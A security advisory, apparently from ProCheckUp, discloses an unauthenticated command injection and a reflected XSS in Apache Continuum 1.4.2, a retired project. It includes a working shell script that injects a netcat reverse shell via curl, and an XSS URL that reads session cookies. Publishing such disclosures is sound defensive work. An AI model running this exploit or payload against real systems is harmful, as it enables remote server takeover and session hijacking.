by

Unauthenticated command injection & reflected XSS within Apache Continuum

PR1-16: Unauthenticated command injection & reflected XSS within Apache Continuum
Vulnerability found:
5th April 2016
Vendor informed:
8th April 2016
Vulnerability fixed:
"Continuum PMC has been dissolved and the project moved to the Attic (http://attic.apache.org/). The issues you raised are not going to be addressed because there is currently no developer community to address them."
Severity:
Critical
Description: 
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/ 
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
Successfully tested on:
Apache Continuum
Version: 1.4.2 (GA)
Consequences: 
Command injection allows Unix commands to be remotely executed with the permissions associated with the web service account. No authentication is required to exploit this vulnerability.  Reflected XSS will allow an attacker to steal an authenticated user s session cookie and impersonate them.
Proof of concepts:
1) Vulnerable to command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
Exploit Code:
#!/bin/sh
if [ $# -eq 0 ]
    then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan - @cyberpunksec ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Vulnerable to Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let s say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim s session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.